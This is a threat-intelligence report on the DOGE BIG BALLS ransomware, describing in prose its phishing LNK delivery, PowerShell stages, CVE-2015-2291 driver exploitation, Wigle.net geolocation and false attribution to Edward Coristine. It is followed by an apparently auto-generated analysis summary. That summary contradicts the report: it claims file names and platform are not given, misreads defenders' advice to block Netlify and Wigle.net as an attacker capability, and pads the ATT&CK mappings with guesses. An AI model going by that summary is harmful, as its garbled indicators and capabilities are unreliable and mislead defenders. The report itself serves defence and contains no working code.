Full Report
Cyble researchers have uncovered ransomware called DOGE BIG BALLS, a ransomware that not just stands out but also presents its technical prowess for audacious psychological manipulation. This malware campaign intricately weaves together advanced exploitation techniques, social engineering, and a deliberate attempt to misattribute blame, notably linking itself to Edward Coristine, a 19-year-old software engineer associated with Elon Musk's DOGE initiative. The Genesis of the DOGE BIG BALLS Attack: A Deceptive ZIP File [caption id="attachment_102052" align="alignnone" width="855"] DOGE BIG Infection Chain (Source: Cyble)[/caption] The attack begins with a seemingly innocuous ZIP file titled "Pay Adjustment.zip," typically disseminated through phishing emails. Inside, a shortcut file named "Pay Adjustment.pdf.lnk" awaits unsuspecting victims. [caption id="" align="alignnone" width="1024"] Contents of LNK file (Source: Cyble)[/caption] Upon activation, this shortcut silently executes a series of PowerShell commands that initiate a multi-stage infection process. The first script, stage1.ps1, checks for administrative privileges. If detected, it proceeds to download and execute a modified version of Fog ransomware, masquerading as "Adobe Acrobat.exe" within a hidden folder in the system's startup directory. [caption id="" align="aligncenter" width="306"] Doge Big Balls Ransomware Prompt (Source: Cyble)[/caption] This stealthy placement ensures that the ransomware runs with elevated privileges, bypassing standard security measures. Exploiting Kernel Vulnerabilities: The CVE-2015-2291 Flaw A pivotal aspect of this attack is the exploitation of CVE-2015-2291, a vulnerability in Intel's Ethernet diagnostics driver (iqvw64e.sys). This flaw allows attackers to execute arbitrary code with kernel-level privileges through specially crafted IOCTL calls. By leveraging this vulnerability, the attackers can escalate their privileges, disable security logging, and maintain persistence within the compromised system. The malicious tool ktool.exe is responsible for this exploitation. It installs the vulnerable driver as a kernel-mode service, granting the ransomware process direct access to kernel memory. This access facilitates the injection of the SYSTEM process token into the ransomware, effectively elevating its privileges and enabling it to disable security mechanisms. Psychological Manipulation: The "DOGE BIG BALLS" Branding The ransomware's name, "DOGE BIG BALLS," is a deliberate attempt to associate the attack with Edward Coristine and the DOGE initiative. Coristine is a prominent figure in the tech community, known for his involvement with Elon Musk's Department of Government Efficiency (DOGE). By incorporating his name and the DOGE reference, the attackers aim to create confusion and misdirect any investigations. The ransom note further compounds this misdirection by including Coristine's personal details, such as his home address and phone number. [caption id="" align="alignnone" width="987"] Chat window (Source: Cyble)[/caption] This tactic serves to intimidate the victim and divert attention from the true perpetrators. Advanced Reconnaissance and Geolocation Techniques Beyond encryption, the attackers employ new methods to gather intelligence about their victims. The lootsubmit.ps1 script collects extensive system and network information, including hardware IDs, firewall states, network configurations, and running processes. This data is transmitted to the attackers via a cloud hosting platform, aiding in further profiling and potential future attacks. Notably, the attackers utilize the Wigle.net API to determine the victim's physical location. By querying the MAC address of the victim's router (BSSID), they can pinpoint the exact geographic location, offering more precise geolocation than traditional IP-based methods. The Role of Havoc C2 Beacon in Post-Exploitation Embedded within the attack is a Havoc C2 beacon (demon.x64.dll), indicating the attackers' potential to maintain long-term access or conduct additional post-encryption activities. This beacon facilitates communication with the attacker's command and control infrastructure, enabling them to issue further instructions or exfiltrate additional data from the compromised system. The Involvement of Edward Coristine: A Case of Misattribution Edward Coristine's name appears prominently in the ransom note, accompanied by his personal contact information. This inclusion is a strategic move by the attackers to mislead investigators and the public into believing that Coristine is responsible for the attack. In reality, Coristine has no involvement in this cybercrime. The use of his name is a calculated attempt to exploit his association with the DOGE initiative and create a false narrative. Coristine's involvement with DOGE, a project aimed at promoting efficiency and transparency in government operations, has made him a recognizable figure in the tech community. By associating his name with the ransomware, the attackers seek to capitalize on his public profile to lend credibility to their demands and confuse potential investigators. Conclusion To fight against DOGE BIG BALLS ransomware attacks, which skillfully combine technical prowess, psychological manipulation, and strategic misdirection—including the false attribution to Edward Coristine—organizations and individuals must adopt a proactive and layered defense strategy. Effective mitigation begins with enforcing strict execution policies to block untrusted LNK files and PowerShell scripts, while consistently monitoring PowerShell activity for anomalies. Deploying advanced Endpoint Detection and Response (EDR) solutions capable of identifying fileless malware and suspicious behavior is essential. Limiting administrative privileges through Role-Based Access Control (RBAC) and monitoring for privilege escalation attempts can further reduce exposure. Additionally, blocking unauthorized outbound connections to services like Netlify and external APIs such as Wigle.net is crucial for preventing data exfiltration and geolocation tracking.
Analysis Summary
# Tool/Technique: DOGE BIG BALLS Ransomware
## Overview
DOGE BIG BALLS is described as a complex cyber threat campaign associated with ransomware activity. A key distinguishing feature of this campaign is the use of strategic misdirection and **reputation damage**, specifically by falsely attributing the attacks to a public figure (Edward Coristine) associated with the DOGE initiative to mislead investigators and gain credibility for their demands.
## Technical Details
- Type: Malware family (Ransomware)
- Platform: Not explicitly stated, but typical ransomware impacts Windows environments due to mentions of LNK files and PowerShell.
- Capabilities: Encryption (implied by "Ransomware"), execution via LNK files and PowerShell scripts, potential data exfiltration, and psychological manipulation through false attribution.
- First Seen: Not explicitly stated in the provided text.
## MITRE ATT&CK Mapping
Based on the described execution methods and goals:
- **TA0001 - Initial Access** (Implied, often via exploiting public-facing applications or phishing)
- **TA0002 - Execution**
- T1204.002 - User Execution: Malicious File
- *Note: Implied if LNK files are the entry vector.*
- T1059 - Command and Scripting Interpreter
- T1059.001 - PowerShell
- **TA0009 - Collection** (Implied, prerequisite for data exfiltration)
- **TA0010 - Exfiltration**
- T1041 - Exfiltration Over C2 Channel (Implied by blocking unauthorized outbound connections)
- **TA0004 - Privilege Escalation** (Implied by monitoring for attempts)
- **TA0005 - Defense Evasion**
- T1218 - Signed Binary Proxy Execution (If signed binaries abuse is present, though not explicitly called out)
- **TA0003 - Persistence** (Implied necessity of ongoing operation)
## Functionality
### Core Capabilities
- **Encryption:** As a ransomware, its core function involves encrypting victim data.
- **Execution via LNK files:** Utilizing LNK files to initiate malicious code execution, bypassing typical email gateways or user scrutiny.
- **PowerShell Execution:** Heavy reliance on PowerShell for both initial stages and potential subsequent actions.
- **False Attribution:** A primary feature is intentionally misleading authorities and the public by naming Edward Coristine, leveraging his public profile associated with the DOGE initiative.
### Advanced Features
- **Psychological Manipulation:** Using the false narrative (tying the attack to Coristine/DOGE) to lend credibility to demands and confuse investigators.
- **External Communication Blocking:** Attackers attempt to prevent data exfiltration or geolocation tracking by blocking unauthorized outbound connections to specific external services (Netlify, Wigle.net).
- **Fileless Malware Techniques:** Detection systems must be capable of identifying fileless malware behavior, suggesting the use of in-memory execution techniques.
## Indicators of Compromise
- File Hashes: [Not provided]
- File Names: [Not provided]
- Registry Keys: [Not provided]
- Network Indicators: Unauthorized outbound connections to services like `Netlify` and external APIs such as `wigle[.]net`.
- Behavioral Indicators:
- Untrusted LNK file execution.
- Anomalous PowerShell script execution.
- Privilege escalation attempts.
## Associated Threat Actors
- The threat actors have actively disguised their identity, specifically framing Edward Coristine. The actual group remains obscured but utilizes sophisticated deception.
## Detection Methods
- **Signature-based detection:** Detection for specific known associated file hashes or network signatures (if discovered).
- **Behavioral detection:** Essential for catching LNK file execution patterns and anomalous PowerShell command-line arguments.
- **YARA rules:** Not explicitly provided.
- **Specific Behavioral Monitoring:** Monitoring for suspicious activity related to using LNK files or scripts for initial payload delivery.
## Mitigation Strategies
- **Execution Policy Enforcement:** Enforce strict execution policies to block untrusted LNK files.
- **Script Monitoring:** Consistently monitor PowerShell activity for anomalies.
- **EDR Deployment:** Deploying advanced Endpoint Detection and Response (EDR) solutions capable of identifying fileless malware and suspicious behavior.
- **Principle of Least Privilege:** Limit administrative privileges using Role-Based Access Control (RBAC).
- **Network Hardening:** Monitor and block unauthorized outbound connections to external services like Netlify and Wigle.net to prevent data exfiltration and geolocation tracking.
## Related Tools/Techniques
- Other Ransomware variants (e.g., BlackByte, Lapsus, referenced in trending tags).
- Techniques involving script execution (PowerShell) for initial access/execution.